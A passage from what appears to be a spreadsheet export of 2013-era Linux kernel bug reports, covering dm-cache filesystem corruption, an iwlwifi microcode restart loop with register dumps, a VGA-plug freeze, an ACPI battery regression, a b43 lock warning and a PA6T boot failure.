11:48:08 nik-deb kernel: [40287.100937] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:09 nik-deb kernel: [40288.106722] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:10 nik-deb kernel: [40288.540475] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:10 nik-deb kernel: [40288.540507] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:10 nik-deb kernel: [40288.540519] Aborting journal on device dm-8-8. Nov 24 11:48:10 nik-deb kernel: [40288.542518] EXT4-fs error (device dm-8): ext4_journal_check_start:56: Detected aborted journal Nov 24 11:48:10 nik-deb kernel: [40288.542527] EXT4-fs (dm-8): Remounting filesystem read-only Nov 24 11:48:11 nik-deb kernel: [40289.635549] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:12 nik-deb kernel: [40290.690935] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:48:13 nik-deb kernel: [40291.766096] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 -HUNDREDS OF THESE - Nov 24 11:49:05 nik-deb kernel: [40343.769604] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:49:07 nik-deb kernel: [40345.772591] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:49:09 nik-deb kernel: [40347.775546] device-mapper: block manager: validator mismatch (old=superblock vs new=sm_bitmap) for block 0 Nov 24 11:49:11 nik-deb kernel: [40349.780741] device-mapper: space map common: bitmap check failed: csum 931274326 != wanted 923296756 Nov 24 11:49:11 nik-deb kernel: [40349.780750] device-mapper: block manager: sm_bitmap validator check failed for block 0 Nov 24 11:49:13 nik-deb kernel: [40351.781451] device-mapper: space map common: bitmap check failed: csum 931274326 != wanted 923296756 Nov 24 11:49:13 nik-deb kernel: [40351.781459] device-mapper: block manager: sm_bitmap validator check failed for block 0 -HUNDREDS OF THESE- Nov 24 11:52:09 nik-deb kernel: [40528.042710] device-mapper: block manager: sm_bitmap validator check failed for block 0 Nov 24 11:52:11 nik-deb kernel: [40530.045688] device-mapper: space map common: bitmap check failed: csum 931274326 != wanted 923296756 Nov 24 11:52:11 nik-deb kernel: [40530.045696] device-mapper: block manager: sm_bitmap validator check failed for block 0 Nov 24 11:52:13 nik-deb kernel: [40532.048648] device-mapper: space map common: bitmap check failed: csum 931274326 != wanted 923296756 Nov 24 11:52:13 nik-deb kernel: [40532.048656] device-mapper: block manager: sm_bitmap validator check failed for block 0 Nov 24 11:52:14 nik-deb init: Switching to runlevel: 1 Nov 24 11:52:15 nik-deb rpcbind: rpcbind terminating on signal. Restart with "rpcbind -w" Nov 24 11:52:15 nik-deb NetworkManager[2788]: &lt;info&gt; caught signal 15, shutting down normally. Nov 24 11:52:15 nik-deb NetworkManager[2788]: &lt;warn&gt; quit request received, terminating... Nov 24 11:52:15 nik-deb NetworkManager[2788]: &lt;info&gt; exiting (success) Nov 24 11:52:15 nik-deb minissdpd[2938]: received signal 15, good-bye Nov 24 11:52:15 nik-deb rpc.statd[1869]: Caught signal 15, un-registering and exiting Nov 24 11:52:15 nik-deb kernel: [40534.051660] device-mapper: space map common: bitmap check failed: csum 931274326 != wanted 923296756 Nov 24 11:52:15 nik-deb kernel: [40534.051666] device-mapper: block manager: sm_bitmap validator check failed for block 0 Nov 24 11:52:15 nik-deb gnome-session[9005]: Gdk-WARNING: gnome-session: Fatal IO error 11 (Resource temporarily unavailable) on X server :0.#012 Nov 24 11:52:15 nik-deb kernel: [40534.489636] emulator64-x86[23434]: segfault at e8 ip 000000000057f645 sp 00007fff0750bee0 error 4 in emulator64-x86[400000+29e000] Nov 24 11:52:15 nik-deb avahi-daemon[2704]: Got SIGTERM, quitting. Nov 24 11:52:15 nik-deb avahi-daemon[2704]: Leaving mDNS multicast group on interface eth0.IPv6 with address fe80::d63d:7eff:fef1:49b5. Nov 24 11:52:15 nik-deb avahi-daemon[2704]: Leaving mDNS multicast group on interface eth0.IPv4 with address 192.168.1.230. Nov 24 11:52:15 nik-deb avahi-daemon[2704]: avahi-daemon 0.6.31 exiting. I then immediately dropped to a console root shell and switched to runlevel 1, and did a few fscks of /home which did complete after 3 passes of fsck -fy /home When I rebooted I did have many corrupt files and folders, mainly in my source tree's compiler output folders, and an files that were being writted during that lockup losy some bits. I don't know if this is a bug or mis-configuration, but I made a best effort guess on building a cache using the only document I can find on the Internet about dm-cache: https://www.kernel.org/doc/Documentation/device-mapper/cache.txt</t>
  </si>
  <si>
    <t>iwlwifi - Microcode SW error detected. Restart loop - Intel 7260</t>
  </si>
  <si>
    <t>3.12.1 3.13.0-rc1</t>
  </si>
  <si>
    <t>2013-11-27 22:43 UTC</t>
  </si>
  <si>
    <t>feddbemm</t>
  </si>
  <si>
    <t>I think this is a known bug. Sometimes I can work for hours until the problem occurs, somtimes it happens faster ~ 15 Minutes. It starts with "Microcode SW error detected." and goes on with a never ending device restart loop (syslog grows a couple of MB per minute). Does anyone know a workaround for this? Disabling ASPM doesn't work. Thanks a lot! - Intel 7260 Wireless - Ubuntu 13.10 - Mainline Kernel 3.13.0-999-generic from Tuesday (25.11.) ASPM is disabled: lspci -vvv | grep ASPM LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- LnkCap: Port #1, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ LnkCap: Port #3, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ LnkCap: Port #4, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;32us LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ /var/log/syslog Nov 27 22:31:14 notebook kernel: [ 2118.484983] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. Nov 27 22:31:14 notebook kernel: [ 2118.484989] iwlwifi 0000:02:00.0: CSR values: Nov 27 22:31:14 notebook kernel: [ 2118.484992] iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) Nov 27 22:31:14 notebook kernel: [ 2118.484997] iwlwifi 0000:02:00.0: CSR_HW_IF_CONFIG_REG: 0X00489204 Nov 27 22:31:14 notebook kernel: [ 2118.485002] iwlwifi 0000:02:00.0: CSR_INT_COALESCING: 0X0000ff40 Nov 27 22:31:14 notebook kernel: [ 2118.485007] iwlwifi 0000:02:00.0: CSR_INT: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485011] iwlwifi 0000:02:00.0: CSR_INT_MASK: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485016] iwlwifi 0000:02:00.0: CSR_FH_INT_STATUS: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485020] iwlwifi 0000:02:00.0: CSR_GPIO_IN: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485024] iwlwifi 0000:02:00.0: CSR_RESET: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485029] iwlwifi 0000:02:00.0: CSR_GP_CNTRL: 0X080403c5 Nov 27 22:31:14 notebook kernel: [ 2118.485033] iwlwifi 0000:02:00.0: CSR_HW_REV: 0X00000144 Nov 27 22:31:14 notebook kernel: [ 2118.485038] iwlwifi 0000:02:00.0: CSR_EEPROM_REG: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485042] iwlwifi 0000:02:00.0: CSR_EEPROM_GP: 0X80000000 Nov 27 22:31:14 notebook kernel: [ 2118.485047] iwlwifi 0000:02:00.0: CSR_OTP_GP_REG: 0X803a0000 Nov 27 22:31:14 notebook kernel: [ 2118.485051] iwlwifi 0000:02:00.0: CSR_GIO_REG: 0X00080044 Nov 27 22:31:14 notebook kernel: [ 2118.485055] iwlwifi 0000:02:00.0: CSR_GP_UCODE_REG: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485060] iwlwifi 0000:02:00.0: CSR_GP_DRIVER_REG: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485064] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP1: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485068] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP2: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485073] iwlwifi 0000:02:00.0: CSR_LED_REG: 0X00000060 Nov 27 22:31:14 notebook kernel: [ 2118.485077] iwlwifi 0000:02:00.0: CSR_DRAM_INT_TBL_REG: 0X882516d3 Nov 27 22:31:14 notebook kernel: [ 2118.485081] iwlwifi 0000:02:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 Nov 27 22:31:14 notebook kernel: [ 2118.485086] iwlwifi 0000:02:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 Nov 27 22:31:14 notebook kernel: [ 2118.485090] iwlwifi 0000:02:00.0: CSR_HW_REV_WA_REG: 0X0001001a Nov 27 22:31:14 notebook kernel: [ 2118.485095] iwlwifi 0000:02:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0010 Nov 27 22:31:14 notebook kernel: [ 2118.485097] iwlwifi 0000:02:00.0: FH register values: Nov 27 22:31:14 notebook kernel: [ 2118.485109] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X252e3c00 Nov 27 22:31:14 notebook kernel: [ 2118.485122] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X0252e3b0 Nov 27 22:31:14 notebook kernel: [ 2118.485135] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_WPTR: 0X000000e0 Nov 27 22:31:14 notebook kernel: [ 2118.485147] iwlwifi 0000:02:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X80801114 Nov 27 22:31:14 notebook kernel: [ 2118.485160] iwlwifi 0000:02:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc Nov 27 22:31:14 notebook kernel: [ 2118.485172] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X07030000 Nov 27 22:31:14 notebook kernel: [ 2118.485184] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485197] iwlwifi 0000:02:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 Nov 27 22:31:14 notebook kernel: [ 2118.485209] iwlwifi 0000:02:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 Nov 27 22:31:14 notebook kernel: [ 2118.485315] iwlwifi 0000:02:00.0: Start IWL Error Log Dump: Nov 27 22:31:14 notebook kernel: [ 2118.485318] iwlwifi 0000:02:00.0: Status: 0x00000000, count: 6 Nov 27 22:31:14 notebook kernel: [ 2118.485320] iwlwifi 0000:02:00.0: 0x000014FC | ADVANCED_SYSASSERT Nov 27 22:31:14 notebook kernel: [ 2118.485322] iwlwifi 0000:02:00.0: 0x00000220 | uPc Nov 27 22:31:14 notebook kernel: [ 2118.485325] iwlwifi 0000:02:00.0: 0x00000000 | branchlink1 Nov 27 22:31:14 notebook kernel: [ 2118.485327] iwlwifi 0000:02:00.0: 0x00000C8A | branchlink2 Nov 27 22:31:14 notebook kernel: [ 2118.485329] iwlwifi 0000:02:00.0: 0x00014078 | interruptlink1 Nov 27 22:31:14 notebook kernel: [ 2118.485331] iwlwifi 0000:02:00.0: 0x00F12104 | interruptlink2 Nov 27 22:31:14 notebook kernel: [ 2118.485333] iwlwifi 0000:02:00.0: 0x00000000 | data1 Nov 27 22:31:14 notebook kernel: [ 2118.485335] iwlwifi 0000:02:00.0: 0x00000000 | data2 Nov 27 22:31:14 notebook kernel: [ 2118.485337] iwlwifi 0000:02:00.0: 0x00010000 | data3 Nov 27 22:31:14 notebook kernel: [ 2118.485339] iwlwifi 0000:02:00.0: 0x06005CE8 | beacon time Nov 27 22:31:14 notebook kernel: [ 2118.485341] iwlwifi 0000:02:00.0: 0x1EB163A1 | tsf low Nov 27 22:31:14 notebook kernel: [ 2118.485343] iwlwifi 0000:02:00.0: 0x00000001 | tsf hi Nov 27 22:31:14 notebook kernel: [ 2118.485345] iwlwifi 0000:02:00.0: 0x00000000 | time gp1 Nov 27 22:31:14 notebook kernel: [ 2118.485347] iwlwifi 0000:02:00.0: 0x12F4247D | time gp2 Nov 27 22:31:14 notebook kernel: [ 2118.485349] iwlwifi 0000:02:00.0: 0x00000000 | time gp3 Nov 27 22:31:14 notebook kernel: [ 2118.485351] iwlwifi 0000:02:00.0: 0x00321600 | uCode version Nov 27 22:31:14 notebook kernel: [ 2118.485353] iwlwifi 0000:02:00.0: 0x00000144 | hw version Nov 27 22:31:14 notebook kernel: [ 2118.485355] iwlwifi 0000:02:00.0: 0x00489204 | board version Nov 27 22:31:14 notebook kernel: [ 2118.485357] iwlwifi 0000:02:00.0: 0x02BF001C | hcmd Nov 27 22:31:14 notebook kernel: [ 2118.485359] iwlwifi 0000:02:00.0: 0x24022000 | isr0 Nov 27 22:31:14 notebook kernel: [ 2118.485361] iwlwifi 0000:02:00.0: 0x01000000 | isr1 Nov 27 22:31:14 notebook kernel: [ 2118.485363] iwlwifi 0000:02:00.0: 0x0000000A | isr2 Nov 27 22:31:14 notebook kernel: [ 2118.485365] iwlwifi 0000:02:00.0: 0x0041FCC0 | isr3 Nov 27 22:31:14 notebook kernel: [ 2118.485366] iwlwifi 0000:02:00.0: 0x00000001 | isr4 Nov 27 22:31:14 notebook kernel: [ 2118.485368] iwlwifi 0000:02:00.0: 0x00000110 | isr_pref Nov 27 22:31:14 notebook kernel: [ 2118.485370] iwlwifi 0000:02:00.0: 0x00027C32 | wait_event Nov 27 22:31:14 notebook kernel: [ 2118.485372] iwlwifi 0000:02:00.0: 0x00004208 | l2p_control Nov 27 22:31:14 notebook kernel: [ 2118.485375] iwlwifi 0000:02:00.0: 0x00018010 | l2p_duration Nov 27 22:31:14 notebook kernel: [ 2118.485376] iwlwifi 0000:02:00.0: 0x0000033F | l2p_mhvalid Nov 27 22:31:14 notebook kernel: [ 2118.485379] iwlwifi 0000:02:00.0: 0x000000E7 | l2p_addr_match Nov 27 22:31:14 notebook kernel: [ 2118.485381] iwlwifi 0000:02:00.0: 0x00000005 | lmpm_pmg_sel Nov 27 22:31:14 notebook kernel: [ 2118.485383] iwlwifi 0000:02:00.0: 0x17061625 | timestamp Nov 27 22:31:14 notebook kernel: [ 2118.485385] iwlwifi 0000:02:00.0: 0x0000E0E8 | flow_handler Nov 27 22:31:14 notebook kernel: [ 2118.485388] ieee80211 phy0: Hardware restart was requested Nov 27 22:31:14 notebook kernel: [ 2118.485720] iwlwifi 0000:02:00.0: L1 Disabled; Enabling L0S Nov 27 22:31:14 notebook kernel: [ 2118.485873] iwlwifi 0000:02:00.0: L1 Disabled; Enabling L0S Nov 27 22:31:15 notebook kernel: [ 2119.493512] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. Nov 27 22:31:15 notebook kernel: [ 2119.493519] iwlwifi 0000:02:00.0: CSR values: Nov 27 22:31:15 notebook kernel: [ 2119.493521] iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) Nov 27 22:31:15 notebook kernel: [ 2119.493527] iwlwifi 0000:02:00.0: CSR_HW_IF_CONFIG_REG: 0X00489204 Nov 27 22:31:15 notebook kernel: [ 2119.493531] iwlwifi 0000:02:00.0: CSR_INT_COALESCING: 0X00000040 Nov 27 22:31:15 notebook kernel: [ 2119.493536] iwlwifi 0000:02:00.0: CSR_INT: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493540] iwlwifi 0000:02:00.0: CSR_INT_MASK: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493545] iwlwifi 0000:02:00.0: CSR_FH_INT_STATUS: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493549] iwlwifi 0000:02:00.0: CSR_GPIO_IN: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493554] iwlwifi 0000:02:00.0: CSR_RESET: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493558] iwlwifi 0000:02:00.0: CSR_GP_CNTRL: 0X080403c5 Nov 27 22:31:15 notebook kernel: [ 2119.493563] iwlwifi 0000:02:00.0: CSR_HW_REV: 0X00000144 Nov 27 22:31:15 notebook kernel: [ 2119.493567] iwlwifi 0000:02:00.0: CSR_EEPROM_REG: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493572] iwlwifi 0000:02:00.0: CSR_EEPROM_GP: 0X80000000 Nov 27 22:31:15 notebook kernel: [ 2119.493576] iwlwifi 0000:02:00.0: CSR_OTP_GP_REG: 0X803a0000 Nov 27 22:31:15 notebook kernel: [ 2119.493580] iwlwifi 0000:02:00.0: CSR_GIO_REG: 0X00080044 Nov 27 22:31:15 notebook kernel: [ 2119.493585] iwlwifi 0000:02:00.0: CSR_GP_UCODE_REG: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493589] iwlwifi 0000:02:00.0: CSR_GP_DRIVER_REG: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493594] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP1: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493598] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP2: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493602] iwlwifi 0000:02:00.0: CSR_LED_REG: 0X00000060 Nov 27 22:31:15 notebook kernel: [ 2119.493607] iwlwifi 0000:02:00.0: CSR_DRAM_INT_TBL_REG: 0X882516d3 Nov 27 22:31:15 notebook kernel: [ 2119.493628] iwlwifi 0000:02:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 Nov 27 22:31:15 notebook kernel: [ 2119.493633] iwlwifi 0000:02:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 Nov 27 22:31:15 notebook kernel: [ 2119.493637] iwlwifi 0000:02:00.0: CSR_HW_REV_WA_REG: 0X0001001a Nov 27 22:31:15 notebook kernel: [ 2119.493642] iwlwifi 0000:02:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0000 Nov 27 22:31:15 notebook kernel: [ 2119.493644] iwlwifi 0000:02:00.0: FH register values: Nov 27 22:31:15 notebook kernel: [ 2119.493657] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X252e3c00 Nov 27 22:31:15 notebook kernel: [ 2119.493674] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X0252e3b0 Nov 27 22:31:15 notebook kernel: [ 2119.493686] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_WPTR: 0X00000080 Nov 27 22:31:15 notebook kernel: [ 2119.493700] iwlwifi 0000:02:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X80801114 Nov 27 22:31:15 notebook kernel: [ 2119.493714] iwlwifi 0000:02:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc Nov 27 22:31:15 notebook kernel: [ 2119.493728] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X07030000 Nov 27 22:31:15 notebook kernel: [ 2119.493742] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493756] iwlwifi 0000:02:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 Nov 27 22:31:15 notebook kernel: [ 2119.493769] iwlwifi 0000:02:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 Nov 27 22:31:15 notebook kernel: [ 2119.493880] iwlwifi 0000:02:00.0: Start IWL Error Log Dump: Nov 27 22:31:15 notebook kernel: [ 2119.493885] iwlwifi 0000:02:00.0: Status: 0x00000000, count: 6 Nov 27 22:31:15 notebook kernel: [ 2119.493889] iwlwifi 0000:02:00.0: 0x000014FC | ADVANCED_SYSASSERT Nov 27 22:31:15 notebook kernel: [ 2119.493893] iwlwifi 0000:02:00.0: 0x000002A0 | uPc Nov 27 22:31:15 notebook kernel: [ 2119.493896] iwlwifi 0000:02:00.0: 0x00000000 | branchlink1 Nov 27 22:31:15 notebook kernel: [ 2119.493900] iwlwifi 0000:02:00.0: 0x00000C8A | branchlink2 Nov 27 22:31:15 notebook kernel: [ 2119.493903] iwlwifi 0000:02:00.0: 0x00014078 | interruptlink1 Nov 27 22:31:15 notebook kernel: [ 2119.493907] iwlwifi 0000:02:00.0: 0x00F12104 | interruptlink2 Nov 27 22:31:15 notebook kernel: [ 2119.493910] iwlwifi 0000:02:00.0: 0x00000000 | data1 Nov 27 22:31:15 notebook kernel: [ 2119.493914] iwlwifi 0000:02:00.0: 0x00000000 | data2 Nov 27 22:31:15 notebook kernel: [ 2119.493917] iwlwifi 0000:02:00.0: 0x00010000 | data3 Nov 27 22:31:15 notebook kernel: [ 2119.493921] iwlwifi 0000:02:00.0: 0x024096FD | beacon time Nov 27 22:31:15 notebook kernel: [ 2119.493925] iwlwifi 0000:02:00.0: 0x1EC0C92E | tsf low Nov 27 22:31:15 notebook kernel: [ 2119.493928] iwlwifi 0000:02:00.0: 0x00000001 | tsf hi Nov 27 22:31:15 notebook kernel: [ 2119.493932] iwlwifi 0000:02:00.0: 0x00000000 | time gp1 Nov 27 22:31:15 notebook kernel: [ 2119.493935] iwlwifi 0000:02:00.0: 0x000F5459 | time gp2 Nov 27 22:31:15 notebook kernel: [ 2119.493939] iwlwifi 0000:02:00.0: 0x00000000 | time gp3 Nov 27 22:31:15 notebook kernel: [ 2119.493942] iwlwifi 0000:02:00.0: 0x00321600 | uCode version Nov 27 22:31:15 notebook kernel: [ 2119.493945] iwlwifi 0000:02:00.0: 0x00000144 | hw version Nov 27 22:31:15 notebook kernel: [ 2119.493948] iwlwifi 0000:02:00.0: 0x00489204 | board version Nov 27 22:31:15 notebook kernel: [ 2119.493952] iwlwifi 0000:02:00.0: 0x0000001C | hcmd Nov 27 22:31:15 notebook kernel: [ 2119.493955] iwlwifi 0000:02:00.0: 0x00022044 | isr0 Nov 27 22:31:15 notebook kernel: [ 2119.493958] iwlwifi 0000:02:00.0: 0x00000000 | isr1 Nov 27 22:31:15 notebook kernel: [ 2119.493961] iwlwifi 0000:02:00.0: 0x00000002 | isr2 Nov 27 22:31:15 notebook kernel: [ 2119.493964] iwlwifi 0000:02:00.0: 0x004000C0 | isr3 Nov 27 22:31:15 notebook kernel: [ 2119.493967] iwlwifi 0000:02:00.0: 0x00000001 | isr4 Nov 27 22:31:15 notebook kernel: [ 2119.493971] iwlwifi 0000:02:00.0: 0x00000112 | isr_pref Nov 27 22:31:15 notebook kernel: [ 2119.493975] iwlwifi 0000:02:00.0: 0x0001F5E6 | wait_event Nov 27 22:31:15 notebook kernel: [ 2119.493978] iwlwifi 0000:02:00.0: 0x00000080 | l2p_control Nov 27 22:31:15 notebook kernel: [ 2119.493982] iwlwifi 0000:02:00.0: 0x00018000 | l2p_duration Nov 27 22:31:15 notebook kernel: [ 2119.493985] iwlwifi 0000:02:00.0: 0x0000003F | l2p_mhvalid Nov 27 22:31:15 notebook kernel: [ 2119.493989] iwlwifi 0000:02:00.0: 0x00000080 | l2p_addr_match Nov 27 22:31:15 notebook kernel: [ 2119.493992] iwlwifi 0000:02:00.0: 0x00000005 | lmpm_pmg_sel Nov 27 22:31:15 notebook kernel: [ 2119.493996] iwlwifi 0000:02:00.0: 0x17061625 | timestamp Nov 27 22:31:15 notebook kernel: [ 2119.493999] iwlwifi 0000:02:00.0: 0x00008090 | flow_handler Nov 27 22:31:15 notebook kernel: [ 2119.494010] ieee80211 phy0: Hardware restart was requested Nov 27 22:31:15 notebook kernel: [ 2119.494414] iwlwifi 0000:02:00.0: L1 Disabled; Enabling L0S Nov 27 22:31:15 notebook kernel: [ 2119.494568] iwlwifi 0000:02:00.0: L1 Disabled; Enabling L0S Nov 27 22:31:16 notebook kernel: [ 2120.502184] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. Nov 27 22:31:16 notebook kernel: [ 2120.502190] iwlwifi 0000:02:00.0: CSR values: Nov 27 22:31:16 notebook kernel: [ 2120.502192] iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) ...</t>
  </si>
  <si>
    <t>System freeze when plugging/unplugging the VGA connector - Sony laptop VGN-SR19XN</t>
  </si>
  <si>
    <t>3.11.0-14</t>
  </si>
  <si>
    <t>2013-12-08 09:32 UTC</t>
  </si>
  <si>
    <t>Lionel Duriez</t>
  </si>
  <si>
    <t>2015-07-21 19:11 UTC</t>
  </si>
  <si>
    <t>Latest working kernel : none to my knowledge Current kernel having the problem : 3.11.0-14-generic Distribution : Ubuntu 64 13.10 Hardware environment : Sony laptop VGN-SR19XN -Processor : Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHz - Memory : 4GB DDR2 Problem description: The system freezes when plugging or unplugging the VGA connector on a Sony Vaio VGN-SR19XN with an Intel 4500MHD graphic card. I initially reported the problem to freedesktop (https://bugs.freedesktop.org/show_bug.cgi?id=58436) but it appears the problem resides on the ACPI side : disabling ACPI makes the problem disappears. Steps to reproduce : - Plug or unplug the VGA connector</t>
  </si>
  <si>
    <t>ACPI Fix that breaks _BIX table parsing.</t>
  </si>
  <si>
    <t>3.8.0.31 onwards</t>
  </si>
  <si>
    <t>2013-12-19 05:52 UTC</t>
  </si>
  <si>
    <t>Francisco Castro</t>
  </si>
  <si>
    <t>2014-02-17 01:12 UTC</t>
  </si>
  <si>
    <t>Hello, Before anything, sorry for my broken english: The issue to be reported here, is that the "fix" for the bug: https://bugzilla.kernel.org/show_bug.cgi?id=60519 which was merged from kernel 3.8.0.31 onwards; makes the battery module fail on a laptop (NEC LZ750/LS) which previously worked. After removing the two lines that the parch added and recompiling, it works again. These are the lines that dmesg is now showing: [ 2.272970] ACPI Warning: For \_SB_.PCI0.LPCB.EC__.BAT1._BIX: Return Package is too small - found 19 elements, expected 20 (20121018/nspredef-679) [ 2.272985] battery: probe of PNP0C0A:00 failed with error -14 The "fix" for that issue should be removed, or at least rewritten, since it breaks compatibility with hardware that's somewhat new, and still on sale. acpidump is attached to the refferenced bug.</t>
  </si>
  <si>
    <t>possible circular locking dependency, b43</t>
  </si>
  <si>
    <t>2013-12-23 17:13 UTC</t>
  </si>
  <si>
    <t>yury</t>
  </si>
  <si>
    <t>2014-11-19 16:20 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">====================================================== [ INFO: possible circular locking dependency detected ] 3.12.0 #1 Not tainted ------------------------------------------------------- rfkill/10040 is trying to acquire lock: (rtnl_mutex){+.+.+.}, at: </t>
  </si>
  <si>
    <t>Kernel 3.13-rc5 doesn't boot with a PA6T cpu</t>
  </si>
  <si>
    <t>3.13-rc5</t>
  </si>
  <si>
    <t>2013-12-27 18:43 UTC</t>
  </si>
  <si>
    <t>Christian Zigotzky</t>
  </si>
  <si>
    <t>2014-01-04 10:23 UTC</t>
  </si>
  <si>
    <t>Hi All, I've tried to test the RC5 on my Nemo board with a PA6T cpu. But it hangs before starting cpu. The kernels 3.12, 3.11, 3.10, 3.9, 3.8 etc. work fine without any problems. It seems that the new kernel 3.13 has a problem with the PA6T CPU. I know that you have done a lot of changes in the CPU code of the kernel 3.13. Do you have an idea? Rgds, Christian Computer ******** Summary ------- -Computer- Processor : PowerPC PA6T, altivec supported (1800,00MHz) Memory : 8087MB (534MB used) Operating System : Debian GNU/Linux jessie/sid User Name : christian (christian) Date/Time : Fr 27 Dez 2013 19:26:11 CET -Display- Resolution : 1280x1024 pixels OpenGL Renderer : Gallium 0.4 on AMD BARTS X11 Vendor : The X.Org Foundation -Multimedia- Audio Adapter : HDA-Intel - HD-Audio Generic Audio Adapter : HDA-Intel - HDA ATI SB -Input Devices- USB Keyboard USB Keyboard Device USB Device A SPEED-LINK Competition Pro -Printers- No printers found -SCSI Disks- ATA ST2000DM001-9YN1 HL-DT-ST DVDRAM GH22NS50 ATA ESA3SF1240GB ATA SanDisk SDCFB-25 Operating System ---------------- -Version- Kernel : Linux 3.11.0AmigaOneX1000 (ppc64) Compiled : #3 SMP Mon Oct 28 19:30:15 EDT 2013 C Library : Unknown Default C Compiler : GNU C Compiler version 4.6.4 (Debian 4.6.4-5) Distribution : Debian GNU/Linux jessie/sid -Current Session- Computer Name : AmigaoneX1000 User Name : christian (christian) Home Directory : /home/christian Desktop Environment : XFCE 4 -Misc- Uptime : 2 hours, 23 minutes Load Average : 0,00, 0,00, 0,00 Kernel Modules -------------- -Loaded Modules- ipv6 : IPv6 protocol stack for Linux loop Processor --------- -Processor- Machine : (null) CPU : PowerPC PA6T, altivec supported (1800,00MHz) L2 Cache : 0kB Frequency : 